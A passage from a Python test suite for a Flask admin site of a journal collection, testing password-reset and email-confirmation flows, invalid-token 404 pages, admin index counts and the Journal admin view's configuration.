'body_has_link': u'<a href="http://localhost%s' % reset_pwd_url
}
# when
create_user(credentials['email'], credentials['password'], True)
with mail.record_messages() as outbox:
response = c.post(
reset_pwd_url,
data={'email': credentials['email']},
follow_redirects=True)
# then
self.assertStatus(response, 200)
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
self.assertEqual(expected_email['subject'], email_msg.subject)
self.assertEqual(expected_email['recipients'], email_msg.recipients)
self.assertIn(expected_email['body_has_link'], email_msg.html)
def test_reset_password_send_valid_link_via_email(self):
"""
With:
a new user (with a confirmed email),
When:
we request password recovery and get the email with
the url needed to complete the operation.
We check:
- the email sent contains a password recovery link.
- the reset-password-with-token page is the correct one.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
reset_pwd_url = url_for('admin.reset')
credentials = {
'email': 'foo@bar.com',
'password': '123'
}
# when
create_user(credentials['email'], credentials['password'], True)
with mail.record_messages() as outbox:
c.post(
reset_pwd_url,
data={'email': credentials['email']},
follow_redirects=True)
# then
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
# collect the links from the email
links_found = reset_pwd_url_pattern.findall(email_msg.html)
# there is at least 1 link, and only one reset/password link with a token
self.assertGreaterEqual(len(links_found), 1)
resert_url_with_token = [url for url in links_found if reset_pwd_url in url]
self.assertEqual(1, len(resert_url_with_token))
resert_url_with_token = resert_url_with_token[0]
# reset password request with the token
reset_pwd_response = c.get(
resert_url_with_token,
follow_redirects=True)
self.assertStatus(reset_pwd_response, 200)
self.assertTemplateUsed('admin/auth/reset_with_token.html')
context_form = self.get_context_variable('form')
self.assertIsInstance(context_form, forms.PasswordForm)
def test_link_sent_via_email_to_reset_password_works_fine(self):
"""
With:
a new user (with a confirmed email),
When:
1. we request password recovery.
2. we get the email with the url needed for the recovery.
3. and we request a new password, using the link from the email.
4. we enter a new password for the user.
We check:
- the password recovery page has the expected form.
- the user's password must be updated.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
reset_pwd_url = url_for('admin.reset')
credentials = {
'email': 'foo@bar.com',
'password': '123'
}
# when
create_user(credentials['email'], credentials['password'], True)
with mail.record_messages() as outbox:
response = c.post(
reset_pwd_url,
data={'email': credentials['email']},
follow_redirects=True)
# then
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
# collect the links from the email
links_found = reset_pwd_url_pattern.findall(email_msg.html)
# there is at least 1 link, and only one reset/password link with a token
self.assertGreaterEqual(len(links_found), 1)
resert_url_with_token = [url for url in links_found if reset_pwd_url in url][0]
new_password = 'blaus'
response = c.post(
resert_url_with_token,
data={'password': new_password},
follow_redirects=True)
self.assertStatus(response, 200)
# verify the user's new password
user = get_user_by_email(credentials['email'])
self.assertTrue(user.is_correct_password(new_password))
def test_reset_password_with_invalid_password_raise_validation_error(self):
"""
With:
a new user (with a confirmed email),
When:
1. we request password recovery.
2. we get the email with the url needed for the recovery.
3. and we request a new password, using the link from the email.
4. we enter an invalid password ('')
We check:
- the page must report that a password is required
- the user's password must not be changed
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
reset_pwd_url = url_for('admin.reset')
credentials = {
'email': 'foo@bar.com',
'password': '123'
}
# when
create_user(credentials['email'], credentials['password'], True)
with mail.record_messages() as outbox:
response = c.post(
reset_pwd_url,
data={'email': credentials['email']},
follow_redirects=True)
# then
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
# collect the links from the email
links_found = reset_pwd_url_pattern.findall(email_msg.html)
# there is at least 1 link, and only one reset/password link with a token
self.assertGreaterEqual(len(links_found), 1)
resert_url_with_token = [url for url in links_found if reset_pwd_url in url][0]
invalid_password = ''
response = c.post(
resert_url_with_token,
data={'password': invalid_password},
follow_redirects=True)
self.assertStatus(response, 200)
context_form = self.get_context_variable('form')
expected_form_error = {'password': [u'This field is required.']}
self.assertEqual(expected_form_error, context_form.errors)
self.assertIn(expected_form_error['password'][0], response.data.decode('utf-8'))
user = get_user_by_email(credentials['email'])
self.assertFalse(user.is_correct_password(invalid_password))
def test_reset_password_with_unconfirmed_email_shows_unconfirm_email_error(self):
"""
With:
a new user (with an UNCONFIRMED email),
When:
1. we request password recovery.
2. we get the email with the url needed for the recovery.
3. and we request a new password, using the link (token) from the email.
We check:
- the page must report that confirming the email is required.
- the password change does not proceed.
- the page must show the admin/auth/unconfirm_email.html template
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
reset_pwd_url = url_for('admin.reset')
credentials = {
'email': 'foo@bar.com',
'password': '123'
}
# when
create_user(credentials['email'], credentials['password'], False)
with mail.record_messages() as outbox:
response = c.post(
reset_pwd_url,
data={'email': credentials['email']},
follow_redirects=True)
# then
# no email was sent
self.assertEqual(0, len(outbox))
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/unconfirm_email.html')
user = get_user_by_email(credentials['email'])
self.assertTrue(user.is_correct_password(credentials['password']))
def test_reset_password_with_unconfirmed_email_raise_validation_error_2(self):
"""
With:
a new user (with a confirmed email),
When:
1. we request password recovery.
2. we get the email with the url needed for the recovery.
3. we change the user so their email is NOT confirmed.
4. and we request a new password, using the link (token) from the email.
We check:
- the page must report that confirming the email is required.
- the password change does not proceed.
- the page must show the admin/auth/unconfirm_email.html template
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
reset_pwd_url = url_for('admin.reset')
credentials = {
'email': 'foo@bar.com',
'password': '123'
}
# when
create_user(credentials['email'], credentials['password'], True)
with mail.record_messages() as outbox:
response = c.post(
reset_pwd_url,
data={'email': credentials['email']},
follow_redirects=True)
# then
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
# collect the links from the email
links_found = reset_pwd_url_pattern.findall(email_msg.html)
# there is at least 1 link, and only one reset/password link with a token
self.assertGreaterEqual(len(links_found), 1)
resert_url_with_token = [url for url in links_found if reset_pwd_url in url][0]
# now the user's email is NOT confirmed.
user = get_user_by_email(credentials['email'])
user.email_confirmed = False
dbsql.session.add(user)
dbsql.session.commit()
# try to recover the password with the link/token from the email
new_password = '321'
response = c.post(
resert_url_with_token,
data={'password': new_password},
follow_redirects=True)
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/unconfirm_email.html')
user = get_user_by_email(credentials['email'])
self.assertTrue(user.is_correct_password(credentials['password']))
def test_reset_password_with_invalid_token_raise_404_error_page(self):
"""
With:
- an invalid token
When:
requesting password recovery with the invalid token
We check:
a 404 error page is shown with the error message
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
invalid_token = 'foo.123.faketoken'
reset_with_token_url = url_for('admin.reset_with_token', token=invalid_token)
expected_errors_msg = u'<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>'
# when
response = c.get(reset_with_token_url, follow_redirects=True)
# then
self.assertStatus(response, 404)
self.assertTemplateUsed('errors/404.html')
error_message = self.get_context_variable('message')
self.assertEqual(expected_errors_msg, error_message)
def test_confirm_email_with_invalid_token_raise_404_message(self):
"""
With:
- an invalid token
When:
requesting email confirmation with the invalid token
We check:
a 404 error page is shown with the error message
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
invalid_token = 'foo.123.faketoken'
confirm_email_url = url_for('admin.confirm_email', token=invalid_token)
expected_errors_msg = u'<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>'
# when
response = c.get(confirm_email_url, follow_redirects=True)
# then
self.assertStatus(response, 404)
self.assertTemplateUsed('errors/404.html')
error_message = self.get_context_variable('message')
self.assertEqual(expected_errors_msg, error_message)
def test_confirmation_email_send_email_with_token(self):
"""
With:
- the 'administrator' user logged in (confirmed email)
- a new user, with an UNCONFIRMED email
When:
1. we send confirmation emails (using the admin/user action)
2.
We check:
- that the email sent contains a link to confirm the email.
- the email is sent to the right recipient.
- after the operation, the page is the correct one.
- the notifications for the user must be shown on the page.
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
normal_user = {
'email': 'foo@bar.com',
'password': '123'
}
create_user(normal_user['email'], normal_user['password'], False)
login_url = url_for('admin.login_view')
action_payload = {
'action': 'confirm_email',
'rowid': get_user_by_email(normal_user['email']).id,
'url': '/admin/user/'
}
expected_email_sent_notifications = [
u"Enviamos o email de confirmação para: %s" % normal_user['email'],
u"1 usuários foram notificados com sucesso!",
]
expected_email = {
'subject': u'Confirmação de email',
'recipients': [normal_user['email'], ],
}
# when
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# log in as the admin user
login_response = c.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
# request the action that sends the confirmation email
with mail.record_messages() as outbox:
action_response = c.post(
'/admin/user/action/',
data=action_payload,
follow_redirects=True)
# then
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
for msg in expected_email_sent_notifications:
self.assertIn(msg, action_response.data.decode('utf-8'))
# we have one email
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
# email sent to the right recipient, with the right subject
self.assertEqual(expected_email['recipients'], email_msg.recipients)
# print "expected_email['subject']: ", expected_email['subject']
# print "email_msg.subject.decode('utf-8')", email_msg.subject
self.assertEqual(expected_email['subject'], email_msg.subject)
# grab the link with the token
links_found = email_confirm_url_pattern.findall(email_msg.html)
# there is at least 1 link, and only one confirmation link with a token
self.assertGreaterEqual(len(links_found), 1)
email_confirmation_url_with_token = [url for url in links_found if '/admin/confirm/' in url]
# we have the url with the token
self.assertEqual(1, len(email_confirmation_url_with_token))
email_confirmation_url_with_token = email_confirmation_url_with_token[0]
self.assertIsNotNone(email_confirmation_url_with_token)
self.assertFalse(email_confirmation_url_with_token == '')
def test_open_confirm_url_with_token_sent_via_email_open_the_correct_page(self):
"""
With:
- the 'administrator' user logged in (confirmed email)
- a new user, with an UNCONFIRMED email
When:
1. we send confirmation emails (using the admin/user action)
2. we access the link sent by email
We check:
- that the email sent contains a link to confirm the email.
- after accessing the link, the page is the correct one.
- after accessing the link, the page shows the operation-ok notification.
- after accessing the link, the user has their email confirmed.
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
normal_user = {
'email': 'foo@bar.com',
'password': '123'
}
create_user(normal_user['email'], normal_user['password'], False)
login_url = url_for('admin.login_view')
action_payload = {
'action': 'confirm_email',
'rowid': get_user_by_email(normal_user['email']).id,
'url': '/admin/user/'
}
expected_msg = u'Email: %s confirmado com sucesso!' % normal_user['email']
# when
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# log in as the admin user
login_response = c.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# request the action that sends the confirmation email
with mail.record_messages() as outbox:
action_response = c.post(
'/admin/user/action/',
data=action_payload,
follow_redirects=True)
# then
self.assertStatus(action_response, 200)
# we have one email
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
# grab the link with the token
links_found = email_confirm_url_pattern.findall(email_msg.html)
# there is at least 1 link, and only one confirmation link with a token
self.assertGreaterEqual(len(links_found), 1)
email_confirmation_url_with_token = [url for url in links_found if '/admin/confirm/' in url]
# we have the tokenized URL
self.assertEqual(1, len(email_confirmation_url_with_token))
email_confirmation_url_with_token = email_confirmation_url_with_token[0]
# open the link from the email
confirmation_response = c.get(email_confirmation_url_with_token, follow_redirects=True)
self.assertStatus(confirmation_response, 200)
self.assertTemplateUsed('admin/index.html')
# confirmation succeeded
self.assertIn(expected_msg, confirmation_response.data.decode('utf-8'))
# verify the user record was updated
user = get_user_by_email(normal_user['email'])
self.assertTrue(user.email_confirmed)
def test_email_confirmation_token_of_invalid_user_raise_404_error_message(self):
"""
With:
- an email address of a user that does not exist in the system.
When:
1. we send confirmation emails (calling notifications.py directly)
2. we open the link sent by email
We check:
- the email sent contains a link to confirm the email address.
- after opening the link, the page shows a 404 error with the right message.
"""
# with
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
fake_user_email = u'foo@bar.com'
# when
with mail.record_messages() as outbox:
send_confirmation_email(fake_user_email)
# then
# exactly one email was sent
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
# grab the link that carries the token
links_found = email_confirm_url_pattern.findall(email_msg.html)
# at least one link, and exactly one /admin/confirm/ link with a token
self.assertGreaterEqual(len(links_found), 1)
email_confirmation_url_with_token = [url for url in links_found if '/admin/confirm/' in url]
# we have the tokenized URL
self.assertEqual(1, len(email_confirmation_url_with_token))
email_confirmation_url_with_token = email_confirmation_url_with_token[0]
# open the link from the email
confirmation_response = c.get(email_confirmation_url_with_token, follow_redirects=True)
self.assertStatus(confirmation_response, 404)
self.assertTemplateUsed('errors/404.html')
error_msg = self.get_context_variable('message')
self.assertIsNotNone(error_msg)
@unittest.skip("Login form no lugar de um UserForm, pq?")
def test_create_user_from_admin_page_creates_a_new_user(self):
"""
With:
- an admin user (email confirmed)
When:
1. we open /admin and register a new user
2. we open the link sent by email
We check:
- the user is created.
- the admin user is notified that the operation succeeded.
- the new user's email is not confirmed yet.
- the new user is notified by email to confirm their address.
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
new_user = {
'email': 'foo@bar.com',
'password': '123'
}
login_url = url_for('admin.login_view')
create_user_url = '/admin/user/new/'
# expected_msgs = [
# u'Enviamos o email de confirmação para: %s' % new_user['email'],
# u'Registro criado com sucesso.',
# ]
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with mail.record_messages() as outbox:
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# request to create the new user (triggers the confirmation email)
create_user_response = client.post(
create_user_url,
data={'email': new_user['email']},
follow_redirects=True)
# then
self.assertStatus(create_user_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# for msg in expected_msgs:
# self.assertIn(msg, create_user_response.data.decode('utf-8'))
# exactly one email was sent
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
# grab the link that carries the token
links_found = email_confirm_url_pattern.findall(email_msg.html)
# at least one link, and exactly one /admin/confirm/ link with a token
self.assertGreaterEqual(len(links_found), 1)
email_confirmation_url_with_token = [url for url in links_found if '/admin/confirm/' in url]
# we have the tokenized URL
self.assertEqual(1, len(email_confirmation_url_with_token))
email_confirmation_url_with_token = email_confirmation_url_with_token[0]
self.assertIsNotNone(email_confirmation_url_with_token)
self.assertNotEqual('', email_confirmation_url_with_token)
# open the link from the email
confirmation_response = self.client.get(email_confirmation_url_with_token, follow_redirects=True)
self.assertStatus(confirmation_response, 200)
self.assertTemplateUsed('admin/index.html')
# confirmation succeeded
# self.assertIn(expected_msg, confirmation_response.data.decode('utf-8'))
# verify the user record was updated (fetched after the confirmation)
user = get_user_by_email(new_user['email'])
self.assertTrue(user.email_confirmed)
@unittest.skip("Login form no lugar de um UserForm, pq?")
def test_try_to_create_user_without_email_must_raise_error_notification(self):
"""
With:
- an admin user (email confirmed)
When:
1. we open /admin
2. we try to register a new user ** without entering an email **
We check:
- the user is not created.
- the admin user is notified that the operation failed.
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
# new_user = {
# 'email': 'foo@bar.com',
# 'password': '123'
# }
login_url = url_for('admin.login_view')
create_user_url = '/admin/user/new/'
expected_form_error = {'email': [u'This field is required.']}
# when
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with mail.record_messages() as outbox:
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# "preencher" from sem o email do novo usuário
create_user_response = client.post(
create_user_url,
data={'email': ''},
follow_redirects=True)
# then
self.assertStatus(create_user_response, 200)
self.assertTemplateUsed('admin/model/create.html')
# the form reports an error
context_form = self.get_context_variable('form')
self.assertEqual(expected_form_error, context_form.errors)
# no email was sent
self.assertEqual(0, len(outbox))
# TEST ADMIN INDEX #
def test_admin_index_content_counts_is_ok(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the /admin page
We check:
- the total counts of documents (journals, issues and articles) are right.
- the counts of published documents (journals, issues and articles) are right.
"""
# with
j_pub = makeOneJournal({'is_public': True})
makeOneJournal({'is_public': False})
i_pub = makeOneIssue({'is_public': True, 'journal': j_pub})
makeOneIssue({'is_public': False, 'journal': j_pub})
makeOneArticle({'is_public': True, 'journal': j_pub, 'issue': i_pub})
makeOneArticle({'is_public': False, 'journal': j_pub, 'issue': i_pub})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# then
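# get_context_variable() (from Flask-Testing) reads a variable out of the
# context of the most recently rendered template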
counts = self.get_context_variable('counts')
count_keys = [
'journals_total_count',
'journals_public_count',
'issues_total_count',
'issues_public_count',
'articles_total_count',
'articles_public_count',
]
for k in count_keys:
self.assertIn(k, counts)
# journal counts
journals_total_count = counts['journals_total_count']
self.assertEqual(2, journals_total_count)
journals_public_count = counts['journals_public_count']
self.assertEqual(1, journals_public_count)
# issue counts
issues_total_count = counts['issues_total_count']
self.assertEqual(2, issues_total_count)
issues_public_count = counts['issues_public_count']
self.assertEqual(1, issues_public_count)
# article counts
articles_total_count = counts['articles_total_count']
self.assertEqual(2, articles_total_count)
articles_public_count = counts['articles_public_count']
self.assertEqual(1, articles_public_count)
class JournalAdminViewTests(BaseTestCase):
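"""Tests for the flask-admin Journal view: listing, details, search,
view configuration (filters, columns, labels, flags) and the
publish/unpublish actions."""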
def test_admin_journal_list_records(self):
"""
With:
- a registered admin user (email confirmed)
- a new Journal record in the database
When:
- we log in and
- open the /admin/journal/ page
We check:
- the created Journal is listed on that page
- and the expected template is used
"""
# with
journal = makeOneJournal()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# open the journals tab
journal_list_response = client.get(url_for('journal.index_view'))
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# the response body contains the journal id
self.assertIn(journal.id, journal_list_response.data.decode('utf-8'))
def test_admin_journal_details(self):
"""
With:
- a registered admin user (email confirmed)
- a new Journal record in the database
When:
- we log in and
- open the journal detail page: /admin/journal/details/
We check:
- the page shows the right journal
"""
# with
journal = makeOneJournal()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_detail_url = url_for('journal.details_view', id=journal.id)
# when
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# open the journal detail page
journal_detail_response = client.get(journal_detail_url)
self.assertStatus(journal_detail_response, 200)
self.assertTemplateUsed('admin/model/details.html')
# then
# the response body contains the journal id
self.assertIn(journal.id, journal_detail_response.data.decode('utf-8'))
def test_admin_journal_search_by_id(self):
"""
With:
- a registered admin user (email confirmed)
- a new Journal record in the database
When:
- we log in and
- open the journal list page: /admin/journal/
- search by the journal id
We check:
- the page shows the right journal
"""
# with
journal = makeOneJournal()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
# when
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journals tab
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
journal_search_response = client.get(journal_index_url, query_string={'search': journal.id})
self.assertStatus(journal_search_response, 200)
# the search result contains the journal id
self.assertIn(journal.id, journal_search_response.data.decode('utf-8'))
def test_admin_journal_check_column_filters(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the journal list page: /admin/journal/
We check:
- it contains all the expected column_filters
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
expected_col_filters = [
'current_status',
'index_at',
'is_public',
'unpublish_reason'
]
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journals tab
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's column filters
column_filters = self.get_context_variable('admin_view').column_filters
self.assertEqual(len(expected_col_filters), len(column_filters))
for expected_col_filter in expected_col_filters:
self.assertIn(expected_col_filter, column_filters)
def test_admin_journal_check_searchable_columns(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the journal list page: /admin/journal/
We check:
- it contains all the expected search fields
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
expected_column_searchable_list = [
'_id', 'title', 'title_iso', 'short_title',
'print_issn', 'eletronic_issn', 'acronym',
]
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journals tab
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's searchable columns
column_searchable_list = self.get_context_variable('admin_view').column_searchable_list
for expected_searchable_field in expected_column_searchable_list:
self.assertIn(expected_searchable_field, column_searchable_list)
def test_admin_journal_check_column_exclude_list(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the journal list page: /admin/journal/
We check:
- the fields excluded from the listing are the expected ones
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
expected_column_exclude_list = [
'_id', 'jid', 'title_slug', 'timeline', 'subject_categories',
'study_areas', 'social_networks', 'title_iso', 'short_title',
'subject_descriptors', 'copyrighter', 'online_submission_url',
'cover_url', 'logo_url', 'previous_journal_ref',
'publisher_name', 'publisher_country', 'publisher_state',
'publisher_city', 'publisher_address', 'publisher_telephone',
'mission', 'index_at', 'sponsors', 'issue_count', 'other_titles',
'print_issn', 'eletronic_issn', 'unpublish_reason', 'url_segment',
]
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journals tab
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's excluded columns
column_exclude_list = self.get_context_variable('admin_view').column_exclude_list
for expected_excluded_field in expected_column_exclude_list:
self.assertIn(expected_excluded_field, column_exclude_list)
def test_admin_journal_check_column_formatters(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the journal list page: /admin/journal/
We check:
- it contains all the expected column formatters
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
expected_column_formatters = [
'created',
'updated',
]
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journals tab
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's column formatters
column_formatters = self.get_context_variable('admin_view').column_formatters
for expected_column_formatter in expected_column_formatters:
self.assertIn(expected_column_formatter, column_formatters.keys())
def test_admin_journal_check_column_labels_defined(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the journal list page: /admin/journal/
We check:
- it contains all the expected field labels
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
expected_column_labels = [
'jid',
'collection',
'timeline',
'subject_categories',
'study_areas',
'social_networks',
'title',
'title_iso',
'short_title',
'created',
'updated',
'acronym',
'scielo_issn',
'print_issn',
'eletronic_issn',
'subject_descriptors',
'online_submission_url',
'cover_url',
'logo_url',
'other_titles',
'publisher_name',
'publisher_country',
'publisher_state',
'publisher_city',
'publisher_address',
'publisher_telephone',
'mission',
'index_at',
'sponsors',
'previous_journal_ref',
'current_status',
'issue_count',
'is_public',
'unpublish_reason',
'url_segment',
]
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journals tab
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's column labels
column_labels = self.get_context_variable('admin_view').column_labels
for expected_column_label in expected_column_labels:
self.assertIn(expected_column_label, column_labels.keys())
def test_admin_journal_check_can_create_is_false(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the journal list page: /admin/journal/
We check:
- creating records is not allowed
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journals tab
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_create flag
can_create = self.get_context_variable('admin_view').can_create
self.assertFalse(can_create)
def test_admin_journal_check_can_edit_is_false(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the journal list page: /admin/journal/
We check:
- editing records is not allowed
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
# when
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journals tab
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_edit flag
can_edit = self.get_context_variable('admin_view').can_edit
self.assertFalse(can_edit)
def test_admin_journal_check_can_delete_is_false(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the journal list page: /admin/journal/
We check:
- deleting records is not allowed
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journals tab
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_delete flag
can_delete = self.get_context_variable('admin_view').can_delete
self.assertFalse(can_delete)
def test_admin_journal_check_create_modal_is_true(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the journal list page: /admin/journal/
We check:
- record creation uses a modal (create_modal is enabled)
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
